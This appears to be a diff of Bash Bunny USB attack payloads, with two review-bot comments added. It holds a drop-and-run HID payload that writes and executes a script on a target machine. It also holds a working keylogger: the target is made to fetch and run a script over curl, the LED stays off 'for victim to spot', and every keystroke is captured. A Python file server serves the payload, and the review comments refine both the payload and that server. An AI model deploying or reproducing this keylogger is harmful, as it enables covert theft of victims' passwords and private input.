|
@ -0,0 +1,7 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Wake up and do something productive here instead...
|
||||||
|
sleep 10
|
||||||
|
|
||||||
|
# boom!!
|
||||||
|
firefox "http://hak5.org"
|
|
@ -0,0 +1,30 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: The Ol'Drop'n'Run
|
||||||
|
# Author: bg-wa
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: HID
|
||||||
|
# Target: UNITY
|
||||||
|
# Attackmodes: HID
|
||||||
|
#
|
||||||
|
# Quick HID only attack to write a file to target machine and open
|
||||||
|
#
|
||||||
|
# | Attack Stage | Description |
|
||||||
|
# | ------------------- | ---------------------------------------- |
|
||||||
|
# | SETUP | Open vi |
|
||||||
|
# | ATTACK | Writing files |
|
||||||
|
# | FINISH | Payload Dropped & ran (remove the bunny) |
|
||||||
|
#
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
|
||||||
|
target_script=\~/fuse.sh
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
DROP $source_script $target_script true true
|
||||||
|
RUN UNITY $target_script
|
||||||
|
|
||||||
|
LED FINISH
|
|
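Review bot: `target_script=\~/fuse.sh` deserves a comment, because the backslash is doing real work: it keeps the tilde literal in the assignment, and since the result of a later `$target_script` expansion is not tilde-expanded either, the value presumably reaches the target as `~/fuse.sh` for the target's own shell to resolve. A reader who "tidies" it to `~/fuse.sh` would get the Bunny's home directory instead. Suggested: `# escaped so the tilde is expanded by the target's shell, not on the Bunny`.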
@ -0,0 +1,20 @@
|
||||||
|
#/bin/bash
|
||||||
|
checkonbunny() {
|
||||||
|
mybunny=$(lsblk -p -S -o NAME,SERIAL | grep $BunnyID | awk '{print $1}')
|
||||||
|
mybunny=$(findmnt $mybunny | grep $mybunny | awk '{print $1}')
|
||||||
|
if [ -d $mybunny ]; then
|
||||||
|
bashbunnyloot=$mybunny"/loot"
|
||||||
|
mapfile=$bashbunnyloot"/maps"
|
||||||
|
keyfile=$bashbunnyloot"/keys"
|
||||||
|
startwork
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
startwork(){
|
||||||
|
getdevicetouse=${getdevicetouse#"id="}
|
||||||
|
xinput --test $getdevicetouse > $keyfile &
|
||||||
|
xmodmap -pke > $mapfile
|
||||||
|
}
|
||||||
|
BunnyID="ch000001"
|
||||||
|
bashbunnyloot=''
|
||||||
|
getdevicetouse=$(xinput |grep keyboard | sed 's/slave keyboard//g' | while IFS= read -r line ;do [[ $line != *"Virtual"* ]] && [[ $line == *"keyboard"* ]] && echo $line | awk '{ for (i=1; i<=NF; ++i) { if ($i ~ "id=") print $i} }'; done)
|
||||||
|
[[ -z $getdevicetouse ]] || checkonbunny
|
|
@ -0,0 +1,28 @@
|
||||||
|
# Keylogger For Bash Bunny
|
||||||
|
|
||||||
|
Author: TheDragonkeeper
|
||||||
|
|
||||||
|
Version: Version 1
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Dirty keylogger. Runs a webserver to pull code from for multiOS targeting
|
||||||
|
|
||||||
|
Captures all keyboard input without the need for root access
|
||||||
|
Uses the user keyboard map file for decoding the captured data
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ---------------- | ----------------------------------------------------------------------------- |
|
||||||
|
| Blue flash | Booting |
|
||||||
|
| Red slow | Waiting on webserver |
|
||||||
|
| Blue Fast | Identifying Target and deploying accordingly |
|
||||||
|
| LED OFF | Capturing data, no led for victim to spot, waiting for switch position change |
|
||||||
|
| LED Red Fast | Decoding keys, Then doing any cleanup required |
|
||||||
|
| Green flashing | Task complete, ready to unplug |
|
||||||
|
|
||||||
|
Still WIP, Currently supports linux (tested on ubuntu)
|
||||||
|
If you want to add payloads for OSX or Windows place them into the switch folder then,
|
||||||
|
Change TARGET_OS= to 'auto' and add the payloads to lines 15,16 as well as the clean up to lines 40,41 in payload.txt
|
||||||
|
|
|
@ -0,0 +1,43 @@
|
||||||
|
TARGET_OS='LINUX'
|
||||||
|
|
||||||
|
LED B 100
|
||||||
|
ATTACKMODE HID STORAGE ECM_ETHERNET
|
||||||
|
sleep 3
|
||||||
|
LED R SLOW
|
||||||
|
GET HOST_IP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
udisk mount
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
python webserver.py &
|
||||||
|
while true; do [[ $(curl $HOST_IP:8080/index.html) ]] && break ; done
|
||||||
|
LED B FAST
|
||||||
|
[[ $TARGET_OS == 'auto' ]] && GET TARGET_OS
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX bash \-c \'bash \<\(curl http\:\/\/$HOST_IP\:8080\/Linux\.sh\)\' \&
|
||||||
|
LED
|
||||||
|
WAIT
|
||||||
|
LED R 0
|
||||||
|
cd /root/udisk/loot
|
||||||
|
keystate=''
|
||||||
|
_ctrl='0'
|
||||||
|
_alt='0'
|
||||||
|
_shift='0'
|
||||||
|
for line in $(cat 'keys')
|
||||||
|
do
|
||||||
|
if [ $line != 'key' ]; then
|
||||||
|
if [ $line == 'press' ] || [ $line == 'release' ]; then
|
||||||
|
keystate=$line
|
||||||
|
else
|
||||||
|
_spaces=$(printf '%*s' $((4-${#line})) | tr ' ' ' ')
|
||||||
|
searchparams='keycode'"$_spaces"$line
|
||||||
|
key=$(cat 'maps' | grep "$searchparams" | awk '{print $4}')
|
||||||
|
echo "Ctrl="$_ctrl" Alt="$_alt" Shift="$_shift" "$keystate" "$key >> 'decoded'
|
||||||
|
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
[[ $TARGET_OS == 'WINDOWS' ]] && RUN WIN add windows payload
|
||||||
|
[[ $TARGET_OS == 'MACOS' ]] && RUN OSX add osx payload
|
||||||
|
[[ $TARGET_OS == 'LINUX' ]] && RUN LINUX killall xinput
|
||||||
|
LED G 0
|
|
@ -0,0 +1,28 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
|
||||||
|
from os import curdir, sep
|
||||||
|
PORT_NUMBER = 8080
|
||||||
|
class myHandler(BaseHTTPRequestHandler):
|
||||||
|
def do_GET(self):
|
||||||
|
if self.path=="/":
|
||||||
|
self.path="/"
|
||||||
|
try:
|
||||||
|
sendReply = False
|
||||||
|
if self.path.endswith(".sh"):
|
||||||
|
mimetype='text/plain'
|
||||||
|
sendReply = True
|
||||||
|
if sendReply == True:
|
||||||
|
f = open(curdir + sep + self.path)
|
||||||
|
self.send_response(200)
|
||||||
|
self.send_header('Content-type',mimetype)
|
||||||
|
self.end_headers()
|
||||||
|
self.wfile.write(f.read())
|
||||||
|
f.close()
|
||||||
|
return
|
||||||
|
except IOError:
|
||||||
|
self.send_error(404,'File Not Found: %s' % self.path)
|
||||||
|
try:
|
||||||
|
server = HTTPServer(('0.0.0.0', PORT_NUMBER), myHandler)
|
||||||
|
server.serve_forever()
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
server.socket.close()
|
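Review bot: `open(curdir + sep + self.path)` uses the request path exactly as received, so `..` segments are honoured and any request whose path ends in `.sh` can read a file outside the server's directory even though the server is bound on `0.0.0.0`; since the only intended content is the script in the payload folder, reduce the path to its basename before opening and keep the `.sh` check. Any request that does not end in `.sh` currently gets no response at all, because `do_GET` falls out of the `try` without sending anything; answering it with `send_error(404, ...)` makes the behaviour explicit. The file handle is also left open if `self.wfile.write` raises, which a `with` block fixes, and the `if self.path=="/": self.path="/"` assignment is a no-op that can go. The rewrite below needs `os.path` imported next to the existing `from os import curdir, sep`; note the module is Python 2 only (`BaseHTTPServer` is `http.server` on Python 3).
```python
    def do_GET(self):
        # Serve only *.sh files from the server's own directory: basename()
        # drops any directory part of the request path, so '..' cannot reach
        # outside it.  Requires os.path imported alongside curdir/sep.
        name = os.path.basename(self.path)
        if not name.endswith(".sh"):
            self.send_error(404, 'File Not Found: %s' % self.path)
            return
        try:
            with open(curdir + sep + name) as f:
                body = f.read()
        except IOError:
            self.send_error(404, 'File Not Found: %s' % self.path)
            return
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(body)
```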